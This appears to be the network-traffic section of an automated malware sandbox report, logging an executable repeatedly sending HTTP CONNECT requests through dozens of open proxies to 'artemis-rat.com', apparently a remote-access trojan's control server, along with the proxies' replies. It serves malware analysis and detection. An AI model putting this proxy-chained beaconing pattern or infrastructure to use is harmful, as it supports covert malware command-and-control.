                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905174971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014776945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.217616081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            583192.168.2.551745174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.970110893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            584192.168.2.55174672.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.971405029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            585192.168.2.55169098.64.169.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.971910954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.828469992 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            586192.168.2.551607103.140.35.1141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.971932888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            587192.168.2.550986120.194.4.15754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972543001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.930648088 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            588192.168.2.55179112.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972645998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            589192.168.2.551696147.75.34.86100003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972742081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.278858900 CET356INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: Zscaler/6.3
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
590192.168.2.55167558.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.972806931 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
591192.168.2.55165131.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.973215103 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
592192.168.2.551713221.153.92.39803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.973474979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.275407076 CET | 310 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 150
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
593192.168.2.551726163.172.153.194163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.973556042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.701689005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.811306953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.939429998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202178955 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.316056967 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
594192.168.2.5517163.73.120.10431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.973666906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.701682091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.905102968 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:14.355638027 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:15.362327099 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:18.594329119 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:24.738430023 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:36.770503998 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:01.859909058 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
595192.168.2.551734121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.974186897 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
596192.168.2.55172037.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.975604057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
597192.168.2.55165345.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.976356983 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            598192.168.2.55176215.236.106.23631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.976577044 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.273684025 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:40 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            599192.168.2.5517308.142.132.204180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.976578951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.297791958 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            600192.168.2.55161338.54.116.931283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.976686954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.391036034 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            601192.168.2.551704134.209.105.20931283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.976891994 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.318137884 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            602192.168.2.551783190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.977231026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            603192.168.2.55070837.187.91.192278983876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.977233887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093039989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202441931 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.202186108 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.201822042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            604192.168.2.55072962.171.131.101258473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.977339983 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.107947111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.124728918 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.217715979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            605192.168.2.55174779.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.978063107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            606192.168.2.551188107.181.168.14541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.978271961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            607192.168.2.551819104.23.126.8803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.978452921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.132911921 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            608192.168.2.551822104.27.37.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.978801012 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.133044004 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            609192.168.2.55174845.11.95.16550393876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.978899002 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.404139996 CET | 39 | IN | HTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            610192.168.2.55166845.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.980252028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            611192.168.2.551845162.159.242.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.980309010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.141674995 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            612192.168.2.55180472.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.980309010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
